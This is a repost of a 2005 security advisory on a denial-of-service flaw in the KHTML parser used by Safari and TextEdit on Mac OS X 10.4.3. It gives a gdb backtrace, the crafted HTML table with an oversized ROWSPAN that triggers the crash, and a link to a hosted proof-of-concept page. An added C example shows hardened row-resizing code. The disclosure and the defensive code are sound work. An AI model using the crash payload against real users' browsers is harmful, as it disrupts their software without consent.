
Mac OS X <= 10.4.3 KHTMLParser Denial of Service



This URL will crash Safari, but not IE or Firefox:

http://www.security-protocols.com/poc/sp-x22.html

 

As OSX becomes more popular, there will be more exploits. Keep this URL handy for further developments:

http://www.security-protocols.com/

 

Mac OS X <= 10.4.3 KHTMLParser DoS

 

Release Date:

December 21, 2005

 

Severity:

Medium

 

Vendor:

Apple

 

Versions Affected:

Mac OS X 10.4.3 and prior

Safari 2.0.2 (416.13) and prior

TextEdit 1.4 (220) and prior

 

Overview:

A denial of service vulnerability exists within the KHTMLParser on Apple OS X 10.4.3 and all prior versions which allows an attacker to crash the application which uses this class.

 

Technical Details:

When running a specially crafted .html file, khtml::RenderTableSection::ensureRows improperly parses the data and causes the crash. The KHTML parser attempts to resize an internal array to the number of elements indicated by the rowspan value. If the value is very large, it is not possible to resize the array and the application quits. On a default install of Apple OS X, Safari and TextEdit are vulnerable.

 

Below the crash is triggered using Safari on OS X 10.4.3 within gdb:

 

Program received signal SIGABRT, Aborted.

0x9004716c in kill ()

(gdb) bt

#0 0x9004716c in kill ()

#1 0x90128b98 in abort ()

#2 0x95dcd974 in khtml::sYSMALLOc () <(=-- Is called because of sYSMALLOc(1234567890)

#3 0x95dce1a4 in khtml::main_thread_realloc ()

#4 0x95bc0d64 in KWQArrayImpl::resize ()

#5 0x95c05428 in khtml::RenderTableSection::ensureRows ()

#6 0x95c0784c in khtml::RenderTableSection::addCell ()

#7 0x95c076ac in khtml::RenderTableRow::addChild ()

#8 0x95bcb2d8 in DOM::NodeImpl::createRendererIfNeeded ()

#9 0x95bcb1c4 in DOM::ElementImpl::attach ()

#10 0x95bca254 in KHTMLParser::insertNode ()

#11 0x95bcadd8 in KHTMLParser::insertNode ()

#12 0x95bcadd8 in KHTMLParser::insertNode ()

#13 0x95bc83fc in KHTMLParser::parseToken ()

#14 0x95bc54a4 in khtml::HTMLTokenizer::processToken ()

#15 0x95bc6e08 in khtml::HTMLTokenizer::parseTag ()

#16 0x95bc4d24 in khtml::HTMLTokenizer::write ()

#17 0x95bc038c in KHTMLPart::write ()

#18 0x959b510c in -[WebDataSource(WebPrivate) _commitLoadWithData:] ()

#19 0x9598165c in -[WebMainResourceClient addData:] ()

#20 0x95981588 in -[WebBaseResourceHandleDelegate didReceiveData:lengthReceived:] ()

#21 0x959db930 in -[WebMainResourceClient didReceiveData:lengthReceived:] ()

#22 0x95981524 in -[WebBaseResourceHandleDelegate connection:didReceiveData:lengthReceived:] ()

#23 0x92910a64 in -[NSURLConnection(NSURLConnectionInternal) _sendDidReceiveDataCallback] ()

#24 0x9290ef04 in -[NSURLConnection(NSURLConnectionInternal) _sendCallbacks] ()

#25 0x9290eca0 in _sendCallbacks ()

#26 0x9075db20 in __CFRunLoopDoSources0 ()

#27 0x9075cf98 in __CFRunLoopRun ()

#28 0x9075ca18 in CFRunLoopRunSpecific ()

#29 0x931861e0 in RunCurrentEventLoopInMode ()

#30 0x931857ec in ReceiveNextEventCommon ()

#31 0x931856e0 in BlockUntilNextEventMatchingListInMode ()

#32 0x93683904 in _DPSNextEvent ()

#33 0x936835c8 in -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] ()

#34 0x00007910 in ?? ()

#35 0x9367fb0c in -[NSApplication run] ()

#36 0x93770618 in NSApplicationMain ()

#37 0x0000307c in ?? ()

#38 0x00057758 in ?? ()

 

The following html code will trigger the crash. You can test this out using Safari, or TextEdit.

 

<TABLE WIDTH=" >

<" >

onLoad=() STYLE=

<SPAN= STYLE= >

<TD STYLE=^ ROWSPAN=1234567890 >

 

or hit the following url:

 

http://www.security-protocols.com/poc/sp-x22.html

 

Vendor Status:

Apple was notified.

 

Discovered by:

Tom Ferris

<tommy[at]security-protocols[dot]com>

 

Related Links:

http://www.security-protocols.com/advisory/sp-x22.txt

http://en.wikipedia.org/wiki/KHTML

http://www.laundromata.com

http://www.apple.com

 

Copyright © 2005 Security-Protocols.com

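A hardened form of the resize pattern the advisory describes, as an added example that is not Apple's or KHTML's code and not part of the original post. It is a simplified C model (`section_t`, `parse_rowspan`, `ensure_rows` and `add_cell` are hypothetical names) that clamps rowspan to 65534, the cap in the current HTML Standard, and reports allocation failure to the caller instead of aborting.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Upper bound the current HTML Standard places on rowspan. */
#define MAX_ROWSPAN 65534u

/* Hypothetical stand-in for the renderer's per-section row array. */
typedef struct { void **rows; size_t count; } section_t;

/* Parse the attribute defensively: unparsable or zero values fall back to 1
   (a simplification in this model), oversized values are clamped. */
unsigned parse_rowspan(const char *attr) {
    char *end;
    unsigned long v = strtoul(attr, &end, 10);
    if (end == attr || v == 0) return 1;
    return v > MAX_ROWSPAN ? MAX_ROWSPAN : (unsigned)v;
}

/* Grow the array to at least `needed` rows. Returns 0 on success, -1 on
   failure; on failure the section is unchanged so the caller can drop the
   cell instead of aborting the process. */
int ensure_rows(section_t *s, size_t needed) {
    if (needed <= s->count) return 0;
    if (needed > SIZE_MAX / sizeof *s->rows) return -1; /* byte count would wrap */
    void **p = realloc(s->rows, needed * sizeof *s->rows);
    if (!p) return -1;
    memset(p + s->count, 0, (needed - s->count) * sizeof *p);
    s->rows = p;
    s->count = needed;
    return 0;
}

/* Add a cell starting at `row` whose height comes from the markup. */
int add_cell(section_t *s, size_t row, const char *rowspan_attr) {
    unsigned span = parse_rowspan(rowspan_attr);
    if (row > SIZE_MAX - span) return -1;
    return ensure_rows(s, row + span);
}

int main(void) {
    section_t s = {0};
    int rc = add_cell(&s, 0, "1234567890"); /* value from the advisory's markup */
    printf("rc=%d rows=%zu\n", rc, s.count);
    free(s.rows);
    return 0;
}
```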
